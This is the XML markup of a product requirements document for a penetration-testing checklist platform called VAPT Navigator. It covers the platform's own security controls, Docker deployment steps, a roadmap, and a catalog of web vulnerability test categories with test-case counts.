          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CSV Export — Spreadsheet format for stakeholder review</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0A1628"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">21. Security of the Platform Itself</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bCs/>
                <w:color w:val="0A1628"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">🔐 CRITICAL: A Security Testing Platform Must Be Secure. We Practice What We Preach.</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21.1 Authentication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Policy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Min 12 chars, uppercase + lowercase + digit + special, common password check via HaveIBeenPwned API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Password Hashing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Argon2id with: memory=65536KB, iterations=3, parallelism=4</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MFA</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TOTP via Google Authenticator / Authy — mandatory for Admin role, optional for testers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Management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HTTP-Only, Secure, SameSite=Strict cookies | 8-hour session timeout | Idle timeout: 30 min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RS256 algorithm | 15-min access token | 7-day refresh token (HTTP-Only cookie)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Brute Force Protection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Account lockout after 5 failed attempts | Progressive delays | IP-based rate limiting via SlowAPI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Login Audit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Every login attempt logged: timestamp, IP, user-agent, result</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21.2 Application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Input Validation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Pydantic v2 strict mode — all inputs validated before processing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SQL Injection Prevention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SQLAlchemy ORM only — parameterized queries — zero raw SQL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XSS Prevention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Next.js JSX auto-escaping + DOMPurify for any rich text input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CSRF Protection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SameSite=Strict cookies + CSRF token for state-changing actions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Security Headers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OWASP recommended headers via FastAPI middleware + Nginx</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Upload Security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Magic byte validation, size limits (10MB), virus scan (ClamAV), isolated storage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Secrets Management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Zero plaintext secrets — HashiCorp Vault or env vars from K8s secrets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RBAC</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 Row-Level Security + application-level role checks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Log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Immutable audit log for all data modifications — cannot be deleted from UI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Encryption at Rest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Sensitive fields (MFA secrets, report content) encrypted with AES-256</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TLS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TLS 1.3 only in production — TLS 1.2 minimum — no deprecated ciphers</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22. DevOps &amp; Deployment</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22.1 Docker Compose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4"/>
              <w:bottom w:val="single" w:color="0EA5E9" w:sz="4"/>
              <w:right w:val="none" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="F1F5F9" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="334155"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Services: frontend (Next.js), backend (FastAPI), postgres, redis, nginx</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Quick Start:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="334155"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">git clone https://github.com/org/vapt-navigator</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="334155"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">cp .env.example .env  # Configure secrets</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="334155"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">docker-compose up -d</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="334155"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">docker-compose exec backend alembic upgrade head  # Run migrations</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="334155"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">docker-compose exec backend python seed.py  # Seed test case database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0"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Access: http://localhost:3000 (Frontend) | http://localhost:8000/docs (API)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3C7A"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">22.2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PostgreSQL connection string (format: postgresql+asyncpg://user:pass@host/db)</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REDIS_URL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Redis connection: redis://localhost:6379/0</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SECRET_KEY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RS256 private key for JWT signing (generate: openssl genrsa -out private.pem 2048)</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JWT_PUBLIC_KEY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RS256 public key for JWT verification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ALLOWED_ORIGINS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Comma-separated frontend domains for CORS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SMTP_HOST/PORT/USER/PASS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Email settings for password reset and notifications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MAX_UPLOAD_SIZE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Max file upload size in bytes (default: 10485760 = 10MB)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0A1628"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">23. Future Roadmap</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2563EB" w:sz="4" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="120" w:before="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3C7A"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 1 — Current (v1.0)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="10B981"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Web Application VAPT Testing — Complete functionality as described in this PRD</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Phase 2 — v1.5 (3 months)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Automatic Report Generation — DOCX + HTML + PDF with screenshots embedded</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Screenshot Integration — Tester uploads screenshots per finding — auto-embedded in report</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">JIRA Integration — Auto-create tickets for each failed test case / finding</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Slack Notifications — Progress updates, critical findings, project milestones</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Phase 3 — v2.0 (6 months)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="F59E0B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Mobile Application VAPT Module — iOS and Android testing checklist with ADB commands</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="F59E0B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Network/Infrastructure VAPT Module — Nmap, Metasploit, vulnerability assessment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="F59E0B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">API Collection Import — Import Postman/Swagger collections to auto-generate test cases</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="F59E0B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">AI-Powered Finding Suggestions — ML model suggests similar past findings</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3C7A"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 4 — v3.0 (12 months)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="94A3B8"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Continuous Testing Integration — CI/CD pipeline trigger for automated subset of tests</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="94A3B8"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerability Management Platform — Track findings through remediation lifecycle</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="94A3B8"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Compliance Mapping — Map findings to PCI-DSS, ISO 27001, SOC2, HIPAA controls</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="94A3B8"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Red Team Collaboration — Multi-operator coordination, attack path visualization</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0A1628"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">24. Appendix — Complete Test Category Catalog</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2563EB" w:sz="4" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="120" w:before="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The following categories are seeded into the test_cases database. Each category contains the full set of test cases with payloads, tool commands, and pass/fail indicators. Custom test cases can be added by any lead or admin.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Module ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6160"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="E2E8F0" w:sz="1"/>
              <w:left w:val="single" w:color="E2E8F0" w:sz="1"/>
              <w:bottom w:val="single" w:color="E2E8F0" w:sz="1"/>
              <w:right w:val="single" w:color="E2E8F0" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="1A3C7A" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Module Name (Total Test Cases from PRD + Extended Coverage)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Insecure Password Transmission (11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Insecure Salt / Salted Hash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Browser Refresh Attack (5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Shoulder Surfing &amp; UI Security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Autocomplete on Sensitive Fields (6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Forgot Password Functionality (9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Change Password Functionality (5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 Policy &amp; Complexity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MOD-09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Easily Guessable Passwords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Password History Policy (2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Session Management (25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Referrer Check Vulnerabilities (2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Improper Redirection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Malicious File Upload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Cache Control Directives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Logging &amp; Monitoring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Error Handling (5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Information Disclosure (7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MOD-19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Directory Listing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Second Factor Authentication (10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Insecure Direct Object Reference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Insecure Deserialization (6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Privilege Escalation (10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 Methods Security (5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 Code Disclosure (5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Host Header Injection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Internal Path Disclosure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SSL/TLS Vulnerabilities (12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MOD-29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IP Spoofing / X-Forwarded-For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Brute Force Attacks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DoS / Rate Limiting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Reflective Defacement (2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CAPTCHA Implementation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CSRF Attacks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XSS &amp; HTML Injection (12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 Injection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XML External Entity (XXE) (4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Miscellaneous Injections (15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MOD-39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AngularJS Vulnerabilities (6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Module Security (14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Compulsory Change Password (2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Virtual Keyboard Security (2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Business Logic &amp; Workflow (20 test cases — extended)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Payment Gateway Security (7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OTP / OTAC Testing (8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Response Replay Attacks (3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File Inclusion Vulnerabilities (6 test cases)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GraphQL Security (10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MOD-49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REST API Security (15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SSRF Testing (8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SSTI Testing (7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JWT/Token Security (10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OAuth/SAML Security (8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WebSocket Security (5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Security Headers Audit (10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CORS Configuration (5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Prototype Pollution (4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MOD-58</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Race Conditions (5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MOD-59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 Request Smuggling (5 test cases — new)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MOD-60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Subdomain Takeover (3 test cases — new)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none" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="EBF4FF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0A1628"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">📊 TOTAL TEST CASE COVERAGE</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val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="334155"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Base Test Cases (from existing Excel checklist): ~344</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="334155"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Extended Test Cases (new modules added by platform): ~400+</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="334155"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Payload Variants per Test Case: 3-10 payloads each</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="334155"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Tool Commands per Test Case: 1-5 commands each</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="334155"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="default"/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2563EB"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">TOTAL APPROXIMATE TEST CASES: 740+</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="334155"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">All organized, filtered, guided, gamified, and tracked.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="0A1628" w:sz="4" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="120" w:before="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200" w:before="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0A1628"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">END OF PRD — VAPT NAVIGATOR v1.0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="94A3B8"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Document prepared for Security Engineering Team | Classification: INTERNAL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pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:color w:val="94A3B8"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve">Security Engineering Division</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:color w:val="94A3B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0A1628"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve">VAPT NAVIGATOR | PRD v1.0</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:color w:val="EF4444"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve">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7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VAPT Navigator PRD</dc:title>
  <dc:creator>VAPT Navigator PRD Generator</dc:creator>
  <dc:description>Product Requirements Document for VAPT Navigator Platform</dc:description>
  <cp:lastModifiedBy>Un-named</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-02-27T09:12:45.468Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-02-27T09:12:45.468Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>